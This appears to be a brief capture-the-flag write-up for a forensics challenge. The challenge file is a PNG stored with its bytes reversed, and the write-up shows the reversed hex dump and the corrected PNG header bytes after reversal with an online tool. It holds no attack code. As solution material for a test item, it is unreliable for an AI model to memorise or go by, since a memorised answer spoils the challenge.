Challenge: Scisnerof----------------------------------------Category: Forensics----------------------------------------70 points ---------------------------------------- ```Description: Written by neptunia I found weird file! elif Hint: Did I put this in the wrong category? File = elif FileAlyzer to hex 82 60 42 AE 44 4E 45 49 00 00 00 00 B0 B4 26 3B ED B0 17 2E 1F FB FE FF 96 1E 21 08 42 63 24 60 78 84 21 09 8C 91 81 E2 10 84 26 32 42 CD 86 96 B9 3F D8 A6 E2 10 84 C6 48 29 8E E5 E9 86 99 3D 3D 3C A6 E2 10 85 13 A8 B9 8E E5 E8 A6 E2 10 84 C6 48 B9 8E E5 E8 A6 E2 10 84 C6 48 89 8E E5 E8 D6 E2 10 85 07 A8 89 8E E5 E8 D6 E2 10 84 C6 48 C3 F5 15 FA 60 A8 07 71 08 42 7D D4 2E C4 93 00 C5 6D 20 77 10 84 26 32 41 1C 77 2F 40 61 A6 CF E7 F3 E0 77 10 84 26 32 41 4C 77 2F 41 F7 10 84 27 7D 41 4C 77 2F 41 F7 10 84 26 32 44 77 1D CB F3 57 8D DC 42 10 98 C9 01 9C 77 2F FA 3C 6E E2 10 84 C6 48 7D C5 13 AF 67 BF C3 77 10 84 26 32 44 D8 9C 20 FF 12 7B 88 42 13 5E A2 6C 4E 10 7F 89 4A F4 FC 2F 97 CB E6 A7 10 84 C6 48 45 EB 56 EB C0 C3 4C 52 BD 26 34 90 5C 2F F9 7F 7D 74 81 49 C4 21 31 92 12 21 DC BF 1D 84 9F 93 6F 45 A7 A7 A7 D8 3D EC 8E 9C 42 13 19 23 DB C5 13 F4 7C DF 3F F8 A5 78 B4 E9 0A 30 EB 42 CE 21 0B EC 91 1D E2 89 E8 3F 23 DA 60 21 98 8E DF E1 2E A9 FA 21 09 7A 96 1D 25 7F 7E 63 22 1D CB FF 46 CF 60 F7 D2 C9 22 06 69 E7 49 36 21 09 26 9D 47 8B F2 98 17 CC 2B 5D CD 9E A6 C6 58 AD B8 7E 8A BE 91 B3 6E F9 37 8B 06 03 44 21 09 E6 3A 79 FC AC 34 0C 7B E6 66 CF 73 64 AF D2 73 B1 5B FD 3F 63 A9 16 2E 17 EE 2C 18 0D 10 84 21 99 6D 0F 2B 01 92 DC 2B A6 2D 64 A9 49 CF 80 B7 F3 A7 EC 75 22 C1 DD 60 4F 45 C2 3A 51 D0 8E E2 A6 F6 21 E0 94 BB FF 4C E6 2E 41 A3 EC 4E B7 B1 92 AE 57 2D FB 3E 5E 51 67 A3 30 10 AD D5 64 0A 80 7F 89 B3 B4 99 94 DB 25 1E 90 7A F0 13 2B 09 3D 79 2D C9 17 08 E9 47 41 A8 85 42 C5 14 1C 7B 94 C7 1B C4 7C E2 D7 80 60 F6 19 07 EC 9F 4C FD B9 69 BF 46 A0 17 5E 72 8B 48 FB 5F B6 3B 1B 01 6F CF 4C C9 6B 25 51 81 8C A0 3C AF A0 86 2E 53 70 6F 6F 98 08 E2 BA FF 94 42 FC 6F E2 81 E1 9B D2 65 A1 F8 F0 3F 64 C4 5A 45 BF FA 5B BB 62 58 42 81 1A 75 9C DC F1 1E 8A DB CC DB EA A6 33 42 C1 63 23 4E ED 0D BA F0 0A 9C C4 B7 11 CE F7 72 27 89 6F CA B2 25 E5 FC 54 42 FC 47 5C FC B9 BE B0 B1 8D 4D F6 7A 43 37 A4 CB 43 F0 80 61 65 2D D4 81 F8 F4 9E 68 6B D6 C4 CD 96 62 AA 1F 1C 40 C0 55 45 B4 99 08 2F F8 73 CC F6 06 65 2B B8 41 ED 57 EB 17 8E 85 83 1D B3 76 86 DD 78 0D 63 60 D5 E2 39 D3 D5 C8 D5 2C F5 B0 BC 4D D6 59 AC 12 9F F4 41 1A EB C2 5E 4E D7 38 EF 27 C1 35 F6 87 3A 59 1F 62 AA B3 9B EB C0 03 30 2A 4C 65 98 E4 8A 7F F7 D9 2A C1 29 16 78 F5 46 5E A6 41 D1 99 BF EF FB FB BD DE E2 C7 7D DF 77 ED 38 7B 4A 03 32 6B 47 7F 75 B7 96 2F 1D 0B 2C 7B 66 ED 33 F8 75 C8 E1 66 F3 CE B8 FB 16 AB 0D 5B 19 82 9F 29 C7 E3 0B DE B2 96 67 46 0F A3 19 D6 61 A8 D0 1A 93 02 E0 1F 0F CE EC 8E B6 87 71 E3 29 D1 83 18 A9 2C FD 1C 3D 98 B4 2A 94 B4 B4 A6 53 3D D5 87 F1 44 59 70 2D 82 37 98 5F 97 E5 FD 7E B6 7F F8 1E DC 3B 6F 2C 5E 3A 16 58 F6 CD 1A 39 A3 FE 88 B1 07 F1 4D 92 90 D8 6C 35 31 5F 59 2A 9F CF D0 BD EB 29 66 74 60 E0 31 1D 2C 84 DF 63 76 AC A2 A1 96 AD 90 2C A6 C5 19 B1 9A 04 06 59 A2 74 0C 45 FF B8 A9 2C E6 FA F0 06 CC 71 3C 65 93 FF B2 B3 12 7E 50 D0 1F 05 C6 64 84 65 D5 21 DE EC C3 58 65 3D B8 76 DE 58 BC 74 2C B1 ED 9A 34 4F AC 5C D1 FC 22 C4 1F C5 30 F5 B3 BC 0B AF 01 12 D6 33 65 E8 1F C2 B3 97 9A B2 17 BD 63 AC 10 D6 6A EB 05 95 55 9E C0 78 8C F9 7A 34 1A D4 C9 09 80 BB B4 AC E9 B1 32 B1 48 CD 29 3E C5 AA 87 29 5F 5A 09 3A 37 89 2B EE B3 91 AF D8 AF CC 5A 40 1F 5A 34 41 0E 20 CF B5 2A C9 5D 26 19 C5 F9 71 98 17 D9 93 FC 27 E3 57 54 9F 67 3D 7B 20 7C C7 6D E0 44 F8 E8 58 0E CD 81 01 B3 48 FB C5 AE 69 31 12 5F 7E A1 D3 EE 22 93 27 A0 8F 2B 97 3E 12 F7 CD 9D E6 1B B5 26 58 CD 6A 2A 29 AB 21 7B D6 9A C3 F7 4E B7 70 1F E0 1E 97 8B 4B DC 01 33 AD 2B EC C7 78 AD 19 A3 EF 1D C4 F6 08 2C E1 58 80 E0 B3 F8 E5 95 98 A5 27 73 42 CE 94 D3 8A FC C8 3F 67 81 D1 A0 0D 5B 4F CA 55 9B 15 AB CC 8F 0D 51 9D 5D A7 70 C6 A9 0E CE 7A F6 09 58 B3 C1 8E B2 99 BB AF 01 32 B1 C7 3D 17 54 65 99 D5 4F AF 16 9F 96 6F 05 5F 98 67 1A 6B DD 78 D2 85 0F 47 7C 6C B2 1B 83 84 F7 98 68 D4 98 E1 52 F1 98 8A B5 35 60 CB D7 80 5D 58 59 AA AB C5 B6 A4 2E 93 25 CD F8 09 9D 69 5D E6 00 58 DC BD 3A F1 36 EB C3 4E 4F 18 B7 DA D1 CA 72 B3 68 60 79 DC B2 06 32 35 F1 A0 7C 26 D8 0F 0C C4 D9 5C AD 1A 00 D5 B4 FC B9 2E F3 2C 51 A2 D0 0C D8 34 21 64 C6 5D 81 2E C7 3D 7A 5B 23 ED 30 BE D8 AD FA 65 E3 89 61 C7 3D 17 54 F7 84 3A D3 56 C3 42 B3 FE F1 D3 61 09 1F 59 59 E9 E8 78 7F 56 18 18 27 8A 64 BF 5E 00 A5 9C 2A A8 DE B5 35 63 AB EB 65 61 BB 6D A0 74 98 7B 41 67 A4 94 35 47 0C C1 CF 31 D8 35 47 D4 98 EA F9 02 8A 6C 06 14 22 C9 58 46 4C EA CB 1C 1D 8D 83 02 74 CC DB 85 65 71 99 80 43 66 8E CF 5A 0D 79 9E 6E E5 EF 32 08 C6 A3 41 97 57 6C 89 45 9E DC 01 8A D8 33 2A 52 23 EB DD 93 0C 20 18 16 E6 D3 D9 95 77 12 CB 4E A9 EC C1 AC E3 88 94 60 F4 F0 6B 01 86 BA 60 3F EF 34 A3 B3 DF FC C8 B1 8E FC 6F B0 F7 14 4B 78 83 32 1C 66 F3 18 6A DA 4C 70 AF 09 5B F7 28 87 7B 35 D9 4B 05 BA 0E 45 C7 B1 F8 FC 7C 0D B5 21 7D 78 05 96 6B 7B D6 C6 66 0F 02 BE BC 00 4A C0 28 47 37 0F 34 8C 81 4F B1 0A F0 91 AD D5 98 02 7D 78 2B 88 E9 6C 88 EF 99 55 58 24 71 22 C2 E7 41 AF 32 65 03 5C F8 72 4C B7 2F 0D 42 1C 7B 7F 01 8A D9 EB 64 7C 3D 77 F9 3F 5D 1E 6D F2 E7 AE E7 78 23 31 DC AC D9 06 76 CC 05 49 96 71 F1 B3 D7 93 71 49 E8 77 65 31 CD BC 19 86 96 66 EA 4C 0B A3 4C 3D C6 5A 75 44 B8 09 4F 66 F3 12 F8 6E BC 59 70 CC 5D 65 1B DF 0C 95 19 58 8B 09 50 63 FA 41 A4 C0 96 5E 33 36 7A 51 3E F3 F0 BF E2 BD 4C 4B 9B 2E C6 EF 65 2C 37 62 14 D2 DE 1E 76 08 F1 84 89 FA 86 EE CC D8 07 17 26 24 E7 78 55 BD EC 66 59 B9 A1 72 93 96 3B C5 3A 6C 90 5A 98 BF AF EB FA CA 40 08 05 D2 63 21 81 88 A5 2A 68 60 C0 E4 A5 4E F7 3B C1 28 8E C6 64 09 D6 C6 A3 9F 45 05 61 E4 60 EC C3 78 5A FE C2 77 AC 8D 6B C7 7A 26 3E D9 57 FA 24 0A 2B 69 5A 30 B8 B4 1A D4 C2 5A F4 87 03 12 20 9E 9B 5E 60 CC BB 02 5D 86 6C A7 F3 04 AA 91 2D 16 71 FE F0 E3 49 9F 32 D6 88 07 C4 A1 F4 B8 C6 13 B5 26 36 55 49 CA 6E EB C0 1C AC 0E FE E2 B5 E7 B1 E6 8F A9 F7 76 66 C0 16 03 9D 9E 20 9F 1D 2A 7E 0E 96 9F DA 22 42 18 B5 A6 DA 98 25 65 AA FA AA 44 52 0E EB C0 03 30 2A 4C B7 ED FB 7D 57 9D 37 AB 5D 68 38 2C 3A F1 E8 26 B9 41 67 7B CD E0 94 47 6B 9E 02 34 FC A4 07 2E 0A C3 C8 C1 D9 BB 48 68 CD 8E D9 8B BC 02 5A A1 8A FD 13 16 F6 69 8F 10 2C E8 18 6B C5 18 C1 55 0B 8B 4C 3D 9D 25 8D E9 D1 F5 E6 2A D1 A2 F3 19 80 57 5F 15 52 25 A2 DE E6 07 D6 88 61 13 33 C7 E5 0B B8 04 4B 35 2B 64 E2 29 4C AA BC 2B 9E 61 8D 94 DA 60 0C 13 96 BF 88 D0 58 4D CB 0E BB 40 1B 43 AD EB 42 53 69 CB 43 40 25 6B 02 17 B2 60 EC D8 F6 AF 81 E0 F4 8B 75 30 AE 33 06 3A 52 72 F3 0D 11 EC C0 54 98 0B 96 C1 A0 75 4C AF A0 6C D9 F9 F9 F7 9E 26 75 68 20 03 2A 87 B1 CA 58 35 4F C2 F9 7C BE 34 AC C1 1A E0 E7 5B A6 CC 2D 02 4D 26 05 C5 A5 B4 C1 03 01 2D 44 97 55 3B 93 13 14 DD 12 4B 78 40 A7 A6 DD E1 8A 3D C1 CA E2 D0 28 5C E8 6F B7 D9 0A 7E 0B 19 77 98 AB 46 8B C9 66 16 9F CF C4 DD BE 8C C4 58 5B AC 7A 68 6D A9 8C C2 07 7D 14 4C F0 7F 93 2A 5E 15 C2 D0 97 A3 44 B9 B3 1C D6 A8 A3 A8 2C FC F1 9B B4 54 F1 D4 68 EF A2 CF 41 00 2E B2 32 CB 33 26 DC 0D F6 33 56 94 1F 85 BA 98 08 17 C0 61 AE 38 F1 79 56 ED D9 84 BC 66 1F E7 F9 FE 06 43 F1 E7 55 99 DA A2 EF 5E 02 05 6C DA B6 3F 1F 8F ED 45 81 D2 96 28 7F A5 C3 6D 94 83 C0 36 3A D0 94 4C 7F 1C 2F B3 22 02 B4 16 73 AA 72 4B 42 5F 54 DF 47 6B 4D C8 81 71 36 EF 13 AE 07 89 E3 66 A2 EC 56 95 A4 23 79 87 88 82 B6 F3 15 68 D1 78 CC C2 DE 19 A4 3D B7 D1 98 8B 05 B9 67 0A 19 B9 4E F7 07 CB 04 AD 6F 0B 2F 76 80 5D 9E 26 6E EA 83 18 51 61 41 60 07 D7 80 96 61 92 EF 78 82 BC C0 04 CE 51 96 59 98 33 49 9B 87 E2 B8 CC 87 26 92 9F 8B 02 86 7F 1F 57 77 98 68 A7 49 FB 45 A3 25 02 C8 7E 20 F5 B5 9A D2 97 B5 42 9C C9 55 A6 32 34 69 CF A0 92 D0 7B 1B 99 D5 28 38 5D E6 44 06 A8 34 A5 B2 93 71 78 EF 2A 73 35 DD E4 0A 9D 28 DC 0D 6A 2E BE E4 69 9F 3C 72 77 CE 9F C6 8D 01 A9 31 8A DF 95 68 D1 79 19 1A E2 36 04 7B 7D 19 94 B0 5B A0 E1 8A D9 04 42 1F D5 6F 9F B8 3E AA 65 55 E1 45 D6 8A 86 19 E8 F4 CD DC AA 2C 28 2C 00 FA F0 12 CC 5D EC F5 53 D2 0B 53 06 4E CB D2 7E EC 4D 8C 43 50 9A 1B BF 5F B2 33 59 37 A4 3A 55 21 26 D9 86 A2 62 AE 2E C6 C2 59 0E AF 67 A4 AA 3D D3 65 CE 4F 7D 4C 64 74 D2 65 9B A1 88 12 F2 1F 03 B5 38 A4 AE 33 07 54 C8 80 B2 63 63 AC 8E 49 87 3C 2A 6A 50 2A 74 4F 7C 48 E3 05 E0 33 30 D8 7C 08 1F 26 07 40 FA 93 24 FB CD B6 1D 98 61 30 33 72 C0 CF B4 64 59 2C 92 51 DF C4 76 71 F1 62 C8 B7 55 19 86 A7 6C 5C 51 67 EC 5D 78 92 6B FF A5 46 0D 9B 66 85 16 14 16 15 6E 3A 0E 9A 74 EB E8 B4 1F 08 22 46 A3 E2 6C 13 98 C5 AC 7A FB 5B 17 E4 1C BF F5 01 B3 26 4E FB F7 FB FD E6 71 AA CD DF AC 34 C8 AB 36 CC DF 76 E6 F3 F3 F3 FB 3C 00 B8 87 13 77 2F 40 89 38 F7 D1 68 AF A0 81 80 96 A2 A0 59 2F 23 95 C6 60 E4 99 2F AF C4 DD 8E B2 6C 34 5A 60 D0 0B AF 01 1B B2 F6 B1 D9 2D 4A AD 4B 81 FA A6 97 A6 80 81 2C 63 70 D2 4C FE DF D1 57 7E 77 8D 53 FE F0 21 ED 4F C9 70 CF D7 F8 3D D9 E8 39 C7 DB 7B D9 C3 D5 A2 42 BB 15 43 E3 81 EA 74 FA 0C 5A 52 B0 A0 B0 49 6C F7 61 8E DF 6F E1 C6 74 32 B0 1E 4C 43 50 99 E8 CC 34 B4 F5 2F 0E FF F6 50 76 A6 07 4D 92 5B CC B5 38 96 07 A7 1F BB B3 38 E6 B7 9F 81 3C F8 2D 0C 14 66 7B 35 D6 82 DE BC 00 33 53 5D E7 A1 FB B6 77 98 D3 1D F7 C4 1A 9B 5E 9A 09 0D A0 56 E9 C1 FD B8 8D E8 19 86 8F 66 77 6A 7E 40 E9 77 D6 07 BB 3C 53 0A 6D A1 4E 1E E2 7B 4A 72 84 CD 26 7B C1 F7 5E 00 55 6A 1D C5 45 63 C3 D3 43 3C 74 6F 11 DA D3 A7 40 BE 9E 85 E9 6C 60 3C 99 8B 0D 7D 8C A0 E5 FA 46 69 78 76 0F 9D 63 1A 28 AD 78 E4 98 DE 65 A9 C4 B0 A3 1B E8 5E 61 2F 19 8F B1 96 6E 68 65 5B C9 CA EF 77 8C C1 C9 30 CF 7C 53 33 D0 03 30 0B BD AD 06 6B 14 07 EE DC DE 18 92 D5 AA B5 6D 4D AE 1B C6 62 9D 6F E0 06 4A C7 58 EA A8 F0 19 4F 37 F9 65 0C 2A D8 53 F0 96 97 1D B3 66 82 77 68 6D 49 96 3B E0 99 82 73 DE 3E 2B FD 16 A7 2F 72 CD 23 3D 98 67 43 33 9E 37 1C B4 5A A5 07 E2 3B 1B 18 0F 26 62 05 3D DE AC 65 D2 56 49 CA 0C 1E DE 65 A9 C4 B2 C7 AA 7B 32 F7 5A CF 4B 43 A6 7A 27 CF 71 6F DF 63 2D 36 01 84 27 3A 6F 3F 92 A3 B0 EC C0 FD DB FB C2 6C 96 AD 55 B2 F7 1C A4 A0 56 C8 EA 3C B4 65 0B 99 55 AB 69 F8 4B 4B 8E D9 81 30 4E ED 0D A9 30 15 35 AC 74 03 B3 1B D3 5D DA 03 D6 92 E4 97 89 68 A5 C1 CB 66 B5 20 A8 D8 AD 91 82 F4 60 3C 98 86 20 59 82 78 96 61 03 D4 F6 60 29 4A A8 CC 67 CB 1A E2 79 65 32 C0 2E 93 2E 52 12 8C 69 51 74 34 AC 1F 0F 87 E9 50 7E 53 A3 54 98 0C 5E 25 E3 30 AE A5 EE 31 59 8C DC 71 00 15 B6 55 69 AD 3F 33 69 71 DB 30 26 09 DD A5 5C B1 DA DB 0B 99 E1 3C 1C 64 2B 46 45 56 4A E8 D6 9A C4 B9 B0 6B 49 80 5B E4 B0 1E 4C 20 F1 6B C0 40 AC 7E ED F7 EB 55 02 2A 83 D1 9F 28 14 CA 7F FC 38 E6 1F 71 EA B3 14 A4 E8 32 D0 62 4E 57 B5 A9 26 E5 13 3A 4C 32 B6 11 54 95 37 98 00 FB 66 DF 0F DF 5E 01 99 AA E5 FE 8A 9C A6 20 9E 43 CA 1A 10 28 77 8E BD 8A DF 98 0F 26 34 7A E0 53 8B 04 3D BE 9D 9F 24 31 99 0D A6 95 01 AF 66 27 D3 E9 F8 D6 AB 25 6E C1 88 38 CD 8E D5 F0 44 6D D5 23 BF 96 BC 4A 9B CC 13 9B 7C C8 60 9D 1A 2C 8D 48 83 57 2F C2 77 12 4C 42 27 F3 01 FC C2 0F 16 BC 01 B3 52 93 E3 19 E9 21 57 FA EA BE DD 7B CC C4 0D DB 08 4C 6D F2 9C EB E4 77 19 80 68 CC 6F DB F6 FC 61 C3 4A D8 59 3F 4B 0D 98 CC 3C 63 59 8F 5F 6C FA 91 3D 01 3B 19 20 BE 8E E2 C0 80 7E 63 47 B6 3B FA 46 83 5D 99 4A 8A 71 BE 56 3D 1B 7D 8B AF 71 CD DB 85 3D 18 4F 07 57 C5 75 4B 61 A9 56 C3 39 CD 98 CC 3C 63 59 8F 5F 6C EC D0 E7 A7 2B D8 C9 00 88 D3 5E 67 64 AC 53 88 0F A2 2C B8 36 3B 2B 32 25 FC DB B0 D4 B8 4C FF D3 18 76 0C FF 3F CF EB 61 3C F2 F5 E3 66 33 13 63 2A F1 9A 7D 99 9A D7 ED 18 38 41 BD 8C 9C DE 02 BC D5 1E 6D E9 C5 37 27 A0 06 A1 DF 66 E0 D8 E6 AC 20 9E AC 66 07 7E 61 AE 98 18 09 6E F9 DF 09 CE 75 20 2C 66 00 77 EF 64 DE E9 30 17 2C 52 28 0D CA 1F 0F 87 D3 3D F4 8A 9E 8A 74 B6 DA D3 33 0C 64 E6 F3 33 88 5A 1D 6C EA DF 46 B2 04 EC DA BD BA C7 1D 64 D1 BA 58 DB 6E FB 26 05 73 13 9D 6F F8 AE 80 C9 D2 61 CE F8 05 D4 C1 29 35 88 75 53 AC B6 7F 9F E7 EC 25 7C A9 9E FF 87 58 FF B6 CE DB 5B DF EF F7 D0 74 A7 9E E8 87 C4 B3 0E 26 32 40 AC D2 27 58 AA C9 81 6A C8 55 8A 78 84 78 EB 03 5D 4C 12 93 58 04 E9 32 08 C0 FE B4 EA 7A D4 FA 7D 3F E4 4E 76 F0 38 BF C2 A7 59 60 4E F3 69 4D BC 26 C8 7C D3 10 3C 42 51 AC FD 2C 36 75 30 0A D6 FF 8B 75 97 8A C1 D9 60 4C DE 37 7E 27 3D 2D 5A 8E B0 35 D4 C1 27 FC C1 27 E2 0B 3A 9E B4 D5 EE 06 13 EC 84 0C 9D E6 1E 6F 96 94 3E 69 81 6F 15 C1 E2 FA 58 5A 83 70 17 53 1B 6B 3C FD 2D CC 46 0A 5A EE 4A EA C1 AE A6 27 73 23 9A DB 3E 7E 7E 78 FE B0 14 C4 82 CF AB 05 AA BE C8 80 5A 64 1C 43 89 7A 07 CA C5 AE AF 85 09 56 E9 61 7A D6 07 E1 F8 7F E8 11 CF CC DC E3 35 64 7F 1F C7 E1 AE A6 01 37 1F C6 EB C5 F9 3D 5D A4 B6 44 02 D3 08 E2 61 F6 AF 8F C5 AB AD 26 F9 56 D2 C0 48 A8 12 53 74 BB 90 48 58 86 B4 98 9B 8F E2 93 89 8C 91 C6 21 54 C6 1A 08 AB 2B EA FA BF DB A3 CF 69 60 BA 2C 09 56 1B 6F 4C 4B 0D 4E 95 46 09 16 48 52 91 DB FA B7 18 A4 A4 E2 63 24 01 C4 C0 49 95 87 1E 19 2B 56 9E 9E 9F DA AD 1E 6D BC 21 D0 CC 04 91 DB 9B 23 5F AF 2B FA FE BF CF CF CF EF FB FE FC BC E2 63 24 3E 88 4F 32 FF BF EF FF 7F DF F7 C2 F2 AC D7 F5 FD 7D E6 9D 9B 92 15 53 4D E2 13 19 20 68 85 4D 13 F4 FD 3F 19 80 96 E7 F3 F9 F1 BB 88 42 63 24 0D 10 91 A2 7A 7A 78 96 02 94 CE E2 10 98 C9 03 44 2D 99 12 25 C0 E7 79 BE 6F 9B E3 F8 FE 3F 82 9C 42 13 19 23 03 C4 21 08 4C 64 8C 0F 10 84 21 31 92 30 3C 42 10 84 C6 48 C0 F1 08 42 13 19 23 03 C4 21 08 4C 64 8C 0F 10 84 21 31 92 30 3C 42 10 84 C6 48 C0 F1 08 42 13 19 23 03 C4 21 08 4C 64 8C 0F 10 84 21 31 92 30 3C 42 10 84 C6 48 B0 F1 08 42 10 9F F7 79 E9 AE 92 4F 73 72 54 92 B7 25 75 4F CE 67 AB BA 4A A9 2B 73 F9 3B BE 74 F7 D7 CE 12 02 3E C6 3C 90 11 F7 22 44 89 12 24 4A DC 48 90 E0 91 2B 95 C8 C0 3C 11 2B 91 22 44 8E 57 C5 14 35 24 9A AF 9D ED 5E 78 54 41 44 49 26 11 00 00 64 A8 6F C7 01 C3 0E 00 00 C3 0E 00 00 73 59 48 70 09 00 00 00 05 61 FC 0B 8F B1 00 00 41 4D 41 67 04 00 00 00 E9 1C CE AE 00 42 47 52 73 01 00 00 00 EE 8D 44 7A 00 00 00 02 08 50 00 00 00 42 02 00 00 52 44 48 49 0D 00 00 00 0A 1A 0A 0D 47 4E 50 89``` We realize that file 'elif' is reversed but the command 'tac' no match !!!!!! I am used the site Dcode to http://www.dcode.fr/ecriture-sens-inverse with 'Inverser l'ordre des mots' ```89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52 00 00 02 42 00 00 00 50 08 02 00 00 00 7A 44 8D EE 00 00 00 01 73 52 47 42 00 AE CE 1C E9 00 00 00 04 67 41 4D 41 00 00 B1 8F 0B FC 61 05 00 00 00 09 70 48 59 73 00 00 0E C3 00 00 0E C3 01 C7 6F A8 64 00 00 11 26 49 44 41 54 78 5E ED 9D AF 9A 24 35 14 C5 57 8E 44 22 91 2B 11 3C C0 C8 95 2B 91 E0 90 48 DC 4A 24 12 89 44 22 F7 11 90 3C C6 3E 02 12 CE D7 F7 74 BE 3B F9 73 2B A9 4A BA AB 67 CE 4F 75 25 B7 92 54 72 73 4F 92 AE E9 79 F7 9F 10 42 08 F1 B0 48 C6 84 10 42 3C 30 92 31 21 84 10 0F 8C 64 4C 08 21 C4 03 23 19 13 42 08 F1 C0 48 C6 84 10 42 3C 30 92 31 21 84 10 0F 8C 64 4C 08 21 C4 03 23 19 13 42 08 F1 C0 48 C6 84 10 42 3C 30 92 31 21 84 10 0F 8C 64 4C 08 21 C4 03 23 19 13 42 9C 82 3F FE F8 E3 9B 6F BE 79 E7 C0 25 12 99 2D 44 03 C9 98 10 E2 CE 94 02 96 78 7A 7A A2 91 10 0D 24 63 42 88 BB F1 F9 F3 E7 96 80 19 3F FD F4 13 4D 85 68 20 19 13 E2 4D 53 15 92 9B 9D E6 7D FD F5 D7 AC F2 C2 F7 DF 7F FF EF BF FF 32 4F 88 3E 24 63 E2 BC FC FE FB EF CF CF CF BF FE FA 2B AF 5F 23 9B DB 91 04 CC D0 21 BC 6D 1E AD DA 9F 9E 9E 56 2B 19 1E 87 95 49 C0 C4 01 24 63 E2 A4 A4 18 B7 FA DB 91 52 48 16 09 46 95 4E 0D 4B 4C 6F 1B 56 09 2C BA 60 69 CF A3 DB BF FA EA 2B AB 08 1A C6 54 21 C6 91 8C 89 93 E2 8F 9B 98 B4 86 58 48 90 BB 74 53 12 A8 48 C0 D2 56 F9 26 AD AB C5 8F AF F6 61 E2 08 D3 02 44 B6 A4 5D 3D F9 C5 EB C6 1F 37 01 A6 AE E1 C7 1F 7F 64 35 E3 DC CC CF 11 E8 7F F8 E1 07 D6 7A 61 E9 56 09 85 AF AE C5 CA 07 7A 89 43 1C 64 5A 80 C8 BE AA 05 AB CF 82 C4 14 B0 FE 78 7E 7E 3E DB 9A 23 73 27 A6 AE C1 EA 4A EE 5A 0A 46 CC 2D FD 3C 6B 1B 53 17 70 83 5A 58 FA E2 C1 15 6F 81 69 3E 94 96 6F 1E E6 9D 0C 84 EC 13 06 EE D5 B4 9E 3A 0B E2 27 C1 FC 27 C1 D4 35 B0 8E 5A 2D 3D 27 7E 37 DE 4C 60 D9 C1 8A 97 75 8B FF D6 0A 30 75 36 2C FD AC 51 42 3C 10 D3 7C C8 26 BC 4D 69 F3 4E 60 59 A7 C2 BF 38 F0 76 4E E4 3F 7D FA D4 7A EA B4 FE C0 08 32 E9 04 58 93 12 4C 5D 03 EB 78 84 78 8A 55 C8 6A 81 C9 AA 58 27 D2 AC 40 32 26 0E B3 C4 87 E8 9E A7 74 D0 F7 EF DF 5B DB CE B6 FF 58 87 FF 9E A9 7C 25 EC E7 9F 7F B6 AC 53 75 88 35 29 C1 D4 05 F8 CE 61 D2 C9 80 AE F8 6F 9D 13 73 05 26 FB 6E DB 58 BA D1 64 1D C7 BA BD DA EC 04 B2 46 DF EA 6C 1D 5A 88 33 F3 E6 64 0C 33 D3 DA B6 74 8A 9E 8A F4 3D D3 87 0F 1F CA 0D 28 52 2C 17 30 E9 DE 64 EF 77 00 66 2C 20 75 CE 09 DF F9 6E 09 18 98 AE 61 7E 07 66 AC 9E 20 AC E6 D8 E0 66 DF A1 06 A0 27 37 C5 E9 6D 1E D5 BC 02 DE 9C 8C BD 41 38 18 ED D7 9A 99 7D 9A F1 2A 63 13 33 66 E3 F5 F2 3C 61 EB CF 3F FF 0C 76 18 D3 FF 4C B8 D4 B0 DB FC 25 32 2B 3B 36 B8 2C A2 0F 88 53 AC 64 67 5E D3 88 00 C9 D8 2B A7 E7 D0 EC 6C 5F 8F 59 63 3C CC 98 CD 39 C3 56 A9 61 4B 75 C5 57 07 4F 18 3D 85 DB CD 71 AF 8B 7D 1B 3D 56 BE 71 8A 4A 99 5D 83 46 FA 3B B6 47 63 7E 80 C0 E2 8E BE 20 19 3B 01 3D 91 FA 6C 5F 8F 59 63 3C CC 98 0D 4B 3F 59 D8 4A C3 61 FC F6 DB 6F CC 68 80 19 77 E4 EB 9C F2 6D 4C 08 DB 0D C4 CC 7B DD BE EA FA 57 21 E9 19 E3 93 52 B3 01 BC 16 0F C2 FC 01 F3 27 42 4C 12 77 C2 2F 57 83 48 8D 2C 1A 9D 60 C8 7C 9B 13 CC 9B 4A BC 96 BF 23 D5 6D 44 F0 D5 8E CD 38 88 C1 6E 25 AB D6 F8 E9 D3 27 66 AF 01 95 A6 0D 99 31 24 9F 9D BE 3D 04 8B 53 E0 7A 34 26 0F 98 DF 8A BD 8E 77 28 10 1A CA 43 9E 20 A6 9C 8A FE E5 AA 99 01 5E DF 0F DF 66 FB 00 98 37 95 54 11 B6 32 4C 3A 13 E5 26 A9 B5 57 4E 62 D0 32 E8 A4 14 B3 EA 71 1F E6 38 FC 7F CA 14 28 9F D1 83 2A 02 55 EB F7 ED 7E AC 40 C0 6B F1 20 4C 1E B0 E4 5B 80 49 6B B0 B9 C4 9A D6 E8 4A 56 45 46 2B 64 1C 3C E1 99 0B DB DA B1 5C A5 DD 09 26 30 DB 71 69 33 3F AD 69 55 B6 15 00 71 DC 8C 59 31 EE A5 AE 30 E3 25 5E 0C 98 54 A3 53 7E 50 E9 87 0F 1F AC 34 74 51 69 8C 12 52 2E 93 2E C0 32 65 79 E2 1A CB 67 CC A8 4A 29 60 F6 D4 03 61 96 78 82 59 20 86 98 3C 60 F4 82 91 AD D8 A8 20 B5 66 CB C1 A5 68 89 97 E4 92 D6 03 DA 5D D3 1B B3 03 74 AC 35 15 30 A9 0D ED 4E 30 81 D9 8E 4B 4B F8 69 AB 55 99 0B 65 B4 3C EA C8 56 A0 A4 1C F7 B2 55 AD 96 6C C2 FB DB FD C0 EC B0 A3 92 3F 6F 3A 27 84 01 36 2D 63 DF 6F 71 CF 27 7A A6 43 4B CF 5A F7 32 7B AA C7 B2 C4 A9 65 DE 1E 0C CA 49 56 D2 65 AC DE 3D 05 62 26 0F 18 1B 3B E2 07 A5 5A B4 1C 37 9E 33 43 67 98 3D 23 CD 72 2F A7 16 FD 2B 3E DE 73 82 99 E0 3B 96 49 6D 68 77 82 66 B3 1D 97 96 F0 53 D8 2A 0C 65 F9 37 4F 19 F0 A8 EA 58 C7 4A 06 E0 6F 9D 62 C6 1B AE 4D 6D B5 AA D5 92 18 DE DC EE 07 14 6B 06 AD BD 0B 30 03 D0 33 53 7C CF 30 C9 C1 8C 77 EF CA C9 5B 65 68 6E 96 B1 8F 19 2F 61 5E E8 1B A3 B0 C4 A9 65 DE 98 E4 78 AD 28 1A 63 9D 0F 76 78 69 46 FA E5 A0 8C 7D 0D 8B 99 3C 60 6C E9 85 9E BE 40 A7 D3 DA 11 6F 74 3C 43 D3 C3 63 45 C5 1D 6A 55 00 5E F7 C1 7B 26 CD 84 72 4A 7B E2 1E 4E A1 6D 0A 53 3C BB 07 D6 77 E9 40 7E 6A 77 66 8F 86 19 E8 8D B8 FD C1 E9 56 A0 0D 09 9A 5E 9B 1A C4 F7 1D D3 98 77 B6 FB A1 E7 5D 